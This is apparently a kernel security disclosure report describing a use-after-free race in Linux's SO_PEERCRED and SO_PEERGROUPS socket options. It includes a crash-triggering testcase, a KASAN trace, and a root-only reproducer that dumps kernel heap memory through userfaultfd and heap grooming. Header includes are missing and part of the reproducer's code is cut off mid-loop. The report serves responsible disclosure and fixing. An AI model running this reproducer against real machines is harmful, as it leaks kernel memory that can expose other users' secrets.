Linux: UAF read: SO_PEERCRED and SO_PEERGROUPS race with listen() (and connect()) # bug description In sock_getsockopt() (in net/core/sock.c), the handlers for the socket options SO_PEERCRED (has probably had a data race since forever that got turned into a UAF read in v2.6.36, commit \"af_unix: Allow SO_PEERCRED to work across namespaces\") and SO_PEERGROUPS (introduced in v4.13, commit \"net: introduce SO_PEERGROUPS getsockopt\") don't use any locking when copying data from sk->sk_peer_cred to userspace. This can race with operations that update sk->sk_peer_cred: - unix_stream_connect() (via copy_peercred(), on CLOSE->ESTABLISHED) - unix_listen() (via init_peercred(), on CLOSE->LISTEN or LISTEN->LISTEN) This means that if the creds are replaced and freed at the wrong time, a use-after-free read occurs. From what I can tell, the impact on the kernel is limited to data leakage. Theoretically, it could also lead to an out-of-bounds *write* to *userspace* memory if a victim process calls SO_PEERGROUPS on a socket whose ->sk_peer_cred is going away; however, in a normal scenario, SO_PEERGROUPS would only be called on a socket from accept(), and a less-privileged attacker wouldn't be able to switch out the ->sk_peer_cred on that socket. # simple testcase In a Linux VM with CONFIG_KASAN=y and CONFIG_RCU_STRICT_GRACE_PERIOD=y, this issue can be demonstrated with the following testcase. Note that this testcase is using SO_PEERCRED in a weird way: It reads the \"peer credentials\" of a listening socket, which doesn't really make any semantic sense. As far as I can tell from reading the code, you could also trigger the same UAF by racing SO_PEERCRED with repeated calls to connect() and shutdown(, SHUT_RDWR) instead of listen(), but then the race would get more complicated. ``` // compile with \"gcc -pthread -o peercred_uaf peercred_uaf.c -Wall\" #define _GNU_SOURCE #include #include #include #include #include #include #include #include static int s; static uid_t my_uid; static gid_t my_gid; void *ucred_thread(void *dummy) { while (1) { struct ucred ucred; socklen_t optlen = sizeof(ucred); if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &ucred, &optlen)) perror(\"getsockopt\"); } } int main(void) { my_uid = getuid(); my_gid = getgid(); s = socket(AF_UNIX, SOCK_STREAM, 0); if (s == -1) err(1, \"socket\"); struct sockaddr_un bind_addr = { .sun_family = AF_UNIX, .sun_path = \"/tmp/unix-test-socket\" }; unlink(bind_addr.sun_path); if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr))) err(1, \"bind\"); pthread_t thread; if (pthread_create(&thread, NULL, ucred_thread, NULL)) errx(1, \"pthread_create\"); while (1) { if (listen(s, 16)) perror(\"listen\"); // avoid glibc's automatic thread sync in set*id() wrappers! // note that setfsuid() doesn't reallocate on no-op request. if (syscall(__NR_setresuid, my_uid, my_uid, my_uid)) err(1, \"setresuid(raw)\"); } } ``` This results in the following splat: ``` BUG: KASAN: use-after-free in sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) Read of size 4 at addr ffff8880355c7c64 by task peercred_uaf/619 CPU: 2 PID: 619 Comm: peercred_uaf Not tainted 5.15.0-rc2-00008-g4c17ca27923c #849 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 Call Trace: dump_stack_lvl (lib/dump_stack.c:107 (discriminator 1)) print_address_description.constprop.0 (mm/kasan/report.c:257) [...] kasan_report.cold (mm/kasan/report.c:443 mm/kasan/report.c:459) [...] sock_getsockopt (net/core/sock.c:1388 net/core/sock.c:1555) [...] __sys_getsockopt (net/socket.c:2216) [...] __x64_sys_getsockopt (net/socket.c:2232) [...] do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) RIP: 0033:0x7f93cd99a5ca Code: 48 8b 0d c9 08 0c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 37 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 96 08 0c 00 f7 d8 64 89 01 48 All code ======== 0: 48 8b 0d c9 08 0c 00 mov 0xc08c9(%rip),%rcx # 0xc08d0 7: f7 d8 neg %eax 9: 64 89 01 mov %eax,%fs:(%rcx) c: 48 83 c8 ff or $0xffffffffffffffff,%rax 10: c3 ret 11: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1) 18: 00 00 00 1b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 20: 49 89 ca mov %rcx,%r10 23: b8 37 00 00 00 mov $0x37,%eax 28: 0f 05 syscall 2a:* 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax <-- trapping instruction 30: 73 01 jae 0x33 32: c3 ret 33: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08d0 3a: f7 d8 neg %eax 3c: 64 89 01 mov %eax,%fs:(%rcx) 3f: 48 rex.W Code starting with the faulting instruction =========================================== 0: 48 3d 01 f0 ff ff cmp $0xfffffffffffff001,%rax 6: 73 01 jae 0x9 8: c3 ret 9: 48 8b 0d 96 08 0c 00 mov 0xc0896(%rip),%rcx # 0xc08a6 10: f7 d8 neg %eax 12: 64 89 01 mov %eax,%fs:(%rcx) 15: 48 rex.W RSP: 002b:00007f93cd89bec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000037 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f93cd99a5ca RDX: 0000000000000011 RSI: 0000000000000001 RDI: 0000000000000003 RBP: 00007f93cd89bef0 R08: 00007f93cd89bee0 R09: 00007f93cd89c700 R10: 00007f93cd89bee4 R11: 0000000000000246 R12: 00007ffff07f1cee R13: 00007ffff07f1cef R14: 00007f93cd89c700 R15: 0000000000000000 Allocated by task 618: kasan_save_stack (mm/kasan/common.c:38) __kasan_slab_alloc (mm/kasan/common.c:46 mm/kasan/common.c:434 mm/kasan/common.c:467) kmem_cache_alloc (./include/linux/kasan.h:254 mm/slab.h:519 mm/slub.c:3206 mm/slub.c:3214 mm/slub.c:3219) prepare_creds (kernel/cred.c:262) __sys_setresuid (kernel/sys.c:666) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) Freed by task 618: kasan_save_stack (mm/kasan/common.c:38) kasan_set_track (mm/kasan/common.c:46) kasan_set_free_info (mm/kasan/generic.c:362) __kasan_slab_free (mm/kasan/common.c:368 mm/kasan/common.c:328 mm/kasan/common.c:374) kmem_cache_free (mm/slub.c:1725 mm/slub.c:3483 mm/slub.c:3499) rcu_core (kernel/rcu/tree.c:2515 kernel/rcu/tree.c:2743) __do_softirq (./include/linux/instrumented.h:71 ./include/linux/atomic/atomic-instrumented.h:27 ./include/linux/jump_label.h:266 ./include/linux/jump_label.h:276 ./include/trace/events/irq.h:142 kernel/softirq.c:559) Last potentially related work creation: kasan_save_stack (mm/kasan/common.c:38) kasan_record_aux_stack (mm/kasan/generic.c:348) call_rcu (kernel/rcu/tree.c:2988 kernel/rcu/tree.c:3067) init_peercred (./include/linux/cred.h:288 ./include/linux/cred.h:281 net/unix/af_unix.c:613) unix_listen (net/unix/af_unix.c:648) __sys_listen (net/socket.c:1727) __x64_sys_listen (net/socket.c:1734) do_syscall_64 (arch/x86/entry/common.c:50 arch/x86/entry/common.c:80) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:113) The buggy address belongs to the object at ffff8880355c7c40 which belongs to the cache cred_jar of size 192 The buggy address is located 36 bytes inside of 192-byte region [ffff8880355c7c40, ffff8880355c7d00) The buggy address belongs to the page: page:ffffea0000d57100 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x355c4 head:ffffea0000d57100 order:2 compound_mapcount:0 compound_pincount:0 flags: 0x4000000000010200(slab|head|zone=1) raw: 4000000000010200 ffffea0000d57208 ffffea0000d57008 ffff88800642d1c0 raw: 0000000000000000 0000000000190019 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff8880355c7b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff8880355c7b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc >ffff8880355c7c00: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb ^ ffff8880355c7c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff8880355c7d00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ``` # root-only reproducer for normal systems The following is a simple reproducer that attempts to use this issue to dump gigabytes of out-of-bounds kernel memory via SO_PEERGROUPS, which effectively reads a copy length (sk->sk_peer_cred->group_info->ngroups) from a dangling pointer in groups_to_user(). (Note: There are two functions called groups_to_user(). The relevant one is in net/core/sock.c.) This isn't quite a real exploit - it **requires root privileges** to call setgroups() and, if userfaultfd is restricted, also to trap a kernel fault with userfaultfd. I expect that you could get around those limitations with some work though, assuming that the attacker is running in a normal Linux userspace. Note that this bug can still be used to dump gigabytes of kernel heap memory, even if CONFIG_HARDENED_USERCOPY is enabled, because the out-of-bounds read occurs outside of usercopy code: ``` static int groups_to_user(gid_t __user *dst, const struct group_info *src) { struct user_namespace *user_ns = current_user_ns(); int i; for (i = 0; i < src->ngroups; i++) if (put_user(from_kgid_munged(user_ns, src->gid[i]), dst + i)) return -EFAULT; return 0; } ``` ``` // gcc -o peergroups-leak peergroups-leak.c -Wall -pthread #define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include // kernel sets upper limit: 65536. // up to 2 pages will be served by slabs, we probably don't want that. // choose a size between order-3 and order-4 (means needs order-4 page) #define ALLOC_SIZE ((0x1000 << 3) * 3 / 2) #define NUM_GROUPS ((ALLOC_SIZE - 8) / 4) #define OUTPUT_MAPPING_LEN 0x400000000 static int s; static int launch_eventfd; static unsigned char *output_mapping; static void *getsockopt_threadfn(void *dummy) { eventfd_t evval; if (eventfd_read(launch_eventfd, &evval)) err(1, \"eventfd_read\"); socklen_t optlen = INT_MAX; if (getsockopt(s, SOL_SOCKET, SO_PEERGROUPS, output_mapping, &optlen)) { perror(\"getsockopt\"); //system(\"cat /proc/$PPID/maps | grep -v AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"); exit(1); } return NULL; } void dump(char *label) { printf(\"\ === DUMP %s ===\ \", label); system(\"grep 'Node.*Unmovable' /proc/pagetypeinfo\"); } int main(void) { char dummy_char; // set up sleep-inducing mapping output_mapping = mmap(NULL, OUTPUT_MAPPING_LEN+0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0); if (output_mapping == MAP_FAILED) err(1, \"mmap\"); if (mprotect(output_mapping+OUTPUT_MAPPING_LEN, 0x1000, PROT_NONE)) err(1, \"mprotect\"); int uffd = syscall(__NR_userfaultfd, O_CLOEXEC); if (uffd == -1) err(1, \"userfaultfd\"); struct uffdio_api api = { .api = UFFD_API, .features = 0 }; if (ioctl(uffd, UFFDIO_API, &api)) err(1, \"UFFDIO_API\"); struct uffdio_register reg = { .range = {.start = (unsigned long)output_mapping, .len = 0x1000}, .mode = UFFDIO_REGISTER_MODE_MISSING }; if (ioctl(uffd, UFFDIO_REGISTER, ®)) err(1, \"UFFDIO_REGISTER\"); // prepare getsockopt() thread launch_eventfd = eventfd(0, 0); if (launch_eventfd == -1) err(1, \"eventfd\"); pthread_t thread; if (pthread_create(&thread, NULL, getsockopt_threadfn, NULL)) errx(1, \"pthread_create\"); // set up for reallocation primitive int realloc_fd = open(\"/proc/self/maps\", O_RDONLY); if (realloc_fd == -1) err(1, \"open maps\"); char tmpdir[] = \"/tmp/blah.XXXXXX\"; if (mkdtemp(tmpdir) == NULL) err(1, \"mkdtemp\"); if (chdir(tmpdir)) err(1, \"chdir tmpdir\"); char dummy_name[100]; memset(dummy_name, 'A', 99); dummy_name[99] = '\\0'; char move_target[200]; sprintf(move_target, \"d/%s\", dummy_name); mkdir(dummy_name, 0700); char file_path[200]; sprintf(file_path, \"%s/a\", dummy_name); int path_len = strlen(tmpdir) + strlen(file_path); // approximate { int fd = open(file_path, O_CREAT|O_RDWR, 0600); if (fd == -1) err(1, \"open deep file\"); if (mmap((void*)0x10000UL, 0x1000, PROT_READ, MAP_SHARED, fd, 0) == MAP_FAILED) err(1, \"mmap deep\"); } bool half_deep_probed = false; while (path_len < ALLOC_SIZE) { mkdir(\"d\", 0700); if (rename(dummy_name, move_target)) err(1, \"rename\"); if (rename(\"d\", dummy_name)) err(1, \"rename 2\"); path_len += strlen(dummy_name) + 1; if (!half_deep_probed && path_len >= ALLOC_SIZE / 2) { half_deep_probed = true; if (pread(realloc_fd, &dummy_char, 1, 0) != 1) err(1, \"read maps half-deep\"); } } s = socket(AF_UNIX, SOCK_STREAM, 0); if (s == -1) err(1, \"socket\"); struct sockaddr_un bind_addr = { .sun_family = AF_UNIX, .sun_path = \"/tmp/unix-test-socket\" }; unlink(bind_addr.sun_path); if (bind(s, (struct sockaddr *)&bind_addr, sizeof(bind_addr))) err(1, \"bind\"); pid_t child = fork(); if (child == -1) err(1, \"fork\"); if (child == 0) { gid_t gid_list[NUM_GROUPS]; gid_t my_gid = getgid(); for (int i=0; i> 62) == 0) break; filled_pages++; } printf(\"got %lu pages\ \", filled_pages); FILE *hexdump = popen(\"hexdump -C\", \"w\"); if (!hexdump) err(1, \"popen\"); fwrite(output_mapping, filled_pages * 0x1000, 1, hexdump); pclose(hexdump); } ``` # disclosure deadline This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2021-12-27. Found by: jhannh@google.com